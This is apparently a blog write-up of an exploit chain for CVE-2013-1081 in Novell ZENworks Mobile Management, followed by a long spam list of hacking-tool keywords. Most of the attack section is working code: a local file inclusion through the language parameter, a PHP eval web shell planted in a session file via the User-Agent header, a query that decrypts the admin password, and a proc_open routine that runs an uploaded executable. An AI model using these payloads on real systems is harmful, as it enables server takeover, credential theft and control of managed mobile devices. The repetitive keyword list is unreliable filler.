Time to wake up - https://www.youtube.com/watch?v=vQObWW06VAM
For some reason the other night I ended up on the Vupen website and saw the following advisory on their page:
Novell ZENworks Mobile Management LFI Remote Code Execution (CVE-2013-1081) [BA+Code]
I took a quick look around and didn't see a public exploit anywhere so after discovering that Novell provides 60 day demos of products, I took a shot at figuring out the bug.
The actual CVE details are as follows:
"Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile Management (ZMM) 2.6.1 and 2.7.0 allows remote attackers to include and execute arbitrary local files via the language parameter."
After setting up a VM (Zenworks MDM 2.6.0) and getting the product installed it looked pretty obvious right away ( 1 request?) where the bug may exist:
POST /DUSAP.php HTTP/1.1Pulling up the source for the "DUSAP.php" script the following code path stuck out pretty bad:
Host: 192.168.20.133
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.20.133/index.php
Cookie: PHPSESSID=3v5ldq72nvdhsekb2f7gf31p84
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
username=&password=&domain=&language=res%2Flanguages%2FEnglish.php&submit=
<?php
session_start();
$UserName = $_REQUEST['username'];
$Domain = $_REQUEST['domain'];
$Password = $_REQUEST['password'];
$Language = $_REQUEST['language'];
$DeviceID = '';
if ($Language !== '' && $Language != $_SESSION["language"])
{
//check for validity
if ((substr($Language, 0, 14) == 'res\\languages\\' || substr($Language, 0, 14) == 'res/languages/') && file_exists($Language))
{
$_SESSION["language"] = $Language;
}
}
if (isset($_SESSION["language"]))
{
require_once( $_SESSION["language"]);
} else
{
require_once( 'res\languages\English.php' );
}
$_SESSION['$DeviceSAKey'] = mdm_AuthenticateUser($UserName, $Domain, $Password, $DeviceID);
- Check if the "language" parameter is passed in on the request
- If the "Language" variable is not empty and if the "language" session value is different from what has been provided, check its value
- The "validation" routine checks that the "Language" variable starts with "res\languages\" or "res/languages/" and then if the file actually exists in the system
- If the user has provided a value that meets the above criteria, the session variable "language" is set to the user provided value
- If the session variable "language" is set, include it into the page
- Authenticate
So it is possible to include any file from the system as long as the provided path starts with "res/languages" and the file exists. To start off it looked like maybe the IIS log files could be a possible candidate to include, but they are not readable by the user everything is executing under…bummer. The next spot I started looking for was if there was any other session data that could be controlled to include PHP. Example session file at this point looks like this:
$error|s:12:"Login Failed";language|s:25:"res/languages/English.php";$DeviceSAKey|i:0;
The "$error" value is server controlled, the "language" has to be a valid file on the system (cant stuff PHP in it), and "$DeviceSAKey" appears to be related to authentication. Next step I started searching through the code for spots where the "$_SESSION" is manipulated hoping to find some session variables that get set outside of logging in. I ran the following to get a better idea of places to start looking:
egrep -R '\$_SESSION\[.*\] =' ./
This pulled up a ton of results, including the following:
/desktop/download.php:$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
Taking a look at the "download.php" file the following was observed:
<?phpThe first highlighted part sets a new session variable "user_agent" to whatever our browser is sending, good so far.... The next highlighted section checks our session for "DeviceSAKey" which is used to check that the requester is authenticated in the system, in this case we are not so this fails and we are redirected to the login page ("index.php"). Because the server stores our session value before checking authentication (whoops) we can use this to store our payload to be included :)
session_start();
if (isset($_SESSION["language"]))
{
require_once( $_SESSION["language"]);
} else
{
require_once( 'res\languages\English.php' );
}
$filedata = $_SESSION['filedata'];
$filename = $_SESSION['filename'];
$usersakey = $_SESSION['UserSAKey'];
$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
$active_user_agent = strtolower($_SESSION['user_agent']);
$ext = substr(strrchr($filename, '.'), 1);
if (isset($_SESSION['$DeviceSAKey']) && $_SESSION['$DeviceSAKey'] > 0)
{
} else
{
$_SESSION['$error'] = LOGIN_FAILED_TEXT;
header('Location: index.php');
}
This will create a session file named "sess_payload" that we can include, the file contains the following:
user_agent|s:34:"<?php echo(eval($_GET['cmd'])); ?>";$error|s:12:"Login Failed";Now, I'm sure if you are paying attention you'd say "wait, why don't you just use exec/passthru/system", well the application installs and configures IIS to use a "guest" account for executing everything – no execute permissions for system stuff (cmd.exe,etc) :(. It is possible to get around this and gain system execution, but I decided to first see what other options are available. Looking at the database, the administrator credentials are "encrypted", but I kept seeing a function being used in PHP when trying to figure out how they were "encrypted": mdm_DecryptData(). No password or anything is provided when calling the fuction, so it can be assumed it is magic:
return mdm_DecryptData($result[0]['Password']);Ends up it is magic – so I sent the following PHP to be executed on the server -
$pass=mdm_ExecuteSQLQuery("SELECT Password FROM Administrators where AdministratorSAKey = 1",array(),false,-1,"","","",QUERY_TYPE_SELECT);
echo $pass[0]["UserName"].":".mdm_DecryptData($pass[0]["Password"]);
Now that the password is available, you can log into the admin panel and do wonderful things like deploy policy to mobile devices (CA + proxy settings :)), wipe devices, pull text messages, etc….
This functionality has been wrapped up into a metasploit module that is available on github:
Next up is bypassing the fact we cannot use "exec/system/passthru/etc" to execute system commands. The issue is that all of these commands try and execute whatever is sent via the system "shell", in this case "cmd.exe" which we do not have rights to execute. Lucky for us PHP provides "proc_open", specifically the fact "proc_open" allows us to set the "bypass_shell" option. So knowing this we need to figure out how to get an executable on the server and where we can put it. The where part is easy, the PHP process user has to be able to write to the PHP "temp" directory to write session files, so that is obvious. There are plenty of ways to get a file on the server using PHP, but I chose to use "php://input" with the executable base64'd in the POST body:
$wdir=getcwd()."\..\..\php\\\\temp\\\\";This bit of PHP will read the HTTP post's body (php://input) , base64 decode its contents, and write it to a file in a location we have specified. This location is relative to where we are executing so it should work no matter what directory the product is installed to.
file_put_contents($wdir."cmd.exe",base64_decode(file_get_contents("php://input")));
$wdir=getcwd()."\..\..\php\\\\temp\\\\";The key here is the "bypass_shell" option that is passed to "proc_open". Since all files that are created by the process user in the PHP "temp" directory are created with "all of the things" permissions, we can point "proc_open" at the file we have uploaded and it will run :)
$cmd=$wdir."cmd.exe";
$output=array();
$handle=proc_open($cmd,array(1=>array("pipe","w")),$pipes,null,null,array("bypass_shell"=>true));
if(is_resource($handle))
{
$output=explode("\\n",+stream_get_contents($pipes[1]));
fclose($pipes[1]);
proc_close($handle);
}
foreach($output+as &$temp){echo+$temp."\\r\\n";};
This process was then rolled up into a metasploit module which is available here:
Update: Metasploit modules are now available as part of metasploit.
More information
- How To Install Pentest Tools In Ubuntu
- Pentest Tools Nmap
- Ethical Hacker Tools
- Hack And Tools
- Pentest Tools Framework
- Hacking Tools For Kali Linux
- Hacker Tools 2019
- Hacking Tools Github
- Pentest Box Tools Download
- Hacker Tools Free
- Hacking Tools Hardware
- Hacking App
- Hackrf Tools
- Pentest Tools Review
- Hacker Tools Mac
- Tools For Hacker
- Hacker Tools Mac
- Pentest Tools Find Subdomains
- Hacking Tools Windows
- Pentest Tools Android
- Pentest Tools Port Scanner
- Hack Tools
- Nsa Hacker Tools
- Pentest Tools Apk
- Hack Tools For Games
- Hacking Tools And Software
- What Is Hacking Tools
- Pentest Tools Kali Linux
- Best Hacking Tools 2019
- How To Install Pentest Tools In Ubuntu
- Tools Used For Hacking
- Hak5 Tools
- Hacker Tools Hardware
- Hacker Techniques Tools And Incident Handling
- Pentest Tools
- Pentest Tools Find Subdomains
- Hacking Tools Software
- Pentest Reporting Tools
- Hacker Tools Apk
- Hacking Tools Mac
- How To Install Pentest Tools In Ubuntu
- Game Hacking
- Hacking Tools Hardware
- Wifi Hacker Tools For Windows
- Hack Tools 2019
- Pentest Tools Framework
- Hack Tools Download
- What Are Hacking Tools
- Hack Apps
- Hacks And Tools
- Pentest Reporting Tools
- Hacker Tools Free
- What Are Hacking Tools
- Hacker Tools For Pc
- Free Pentest Tools For Windows
- Hacker Tools Free Download
- Install Pentest Tools Ubuntu
- Hacking Tools Mac
- Hack Tools
- Underground Hacker Sites
- Nsa Hacker Tools
- Hack Tool Apk
- How To Install Pentest Tools In Ubuntu
- Hacking Tools For Windows
- Hacker Tools Github
- Hacker
- Hacking Tools For Windows Free Download
- Hackers Toolbox
- Hacker Tools List
- Hack Tools For Pc
- Hacker Tools For Windows
- Hacking Tools For Pc
- Hacker Tools Mac
- Pentest Tools Android
- Pentest Tools Review
- Pentest Tools List
- Pentest Tools Url Fuzzer
- Free Pentest Tools For Windows
- Pentest Tools Website
- New Hack Tools
- Hacker Tools 2019
- Hacking Tools For Windows 7
- Pentest Tools For Android
- Computer Hacker
- Pentest Tools List
- Underground Hacker Sites
- Ethical Hacker Tools
- Hack Tool Apk
- Pentest Tools Review
- Computer Hacker
- Hacking Tools Pc
- Pentest Tools Framework
- Pentest Tools Port Scanner
- Hacker Tools Free
- Pentest Tools Framework
- Hacker Tools Free Download
- Hacking App
- Pentest Tools For Mac
- Pentest Tools Free
- Hack Tools Mac
- Pentest Tools For Ubuntu
- Pentest Tools Nmap
- Hacker Security Tools
- Top Pentest Tools
- Pentest Tools Github
- Hack Tools For Ubuntu
- Hack Tools For Games
- Usb Pentest Tools
- Pentest Tools Port Scanner
- Hacking Tools
- What Are Hacking Tools
- Usb Pentest Tools
- Hacker Hardware Tools
- Tools Used For Hacking
- Bluetooth Hacking Tools Kali
- Hack Tools For Mac
- Game Hacking
- Hacker Tools 2020
- Hacker Security Tools
- Pentest Tools Framework
- Pentest Tools Website Vulnerability
- Pentest Tools Alternative
- Pentest Tools For Windows
- Hak5 Tools
- Wifi Hacker Tools For Windows
- Hack Tool Apk No Root
- What Are Hacking Tools
- Hack Tools For Pc
- Hacker Tools Free Download
- Hacks And Tools
- Hacking Tools 2019
- Pentest Tools Find Subdomains
- Hack Tools 2019
- Hack And Tools
- Pentest Tools For Ubuntu
- Hacker Tools List
- Pentest Tools Download
- Pentest Tools Apk
- Free Pentest Tools For Windows
- Tools 4 Hack
- Install Pentest Tools Ubuntu
- Pentest Tools
- Hacking Tools For Windows
- Hacker Tools Windows
- Hackers Toolbox
- Hack Tool Apk
- Hacking Tools Name
- Pentest Tools Website
- Hack Tools For Mac
- Hack Tools
- Pentest Box Tools Download
No comments:
Post a Comment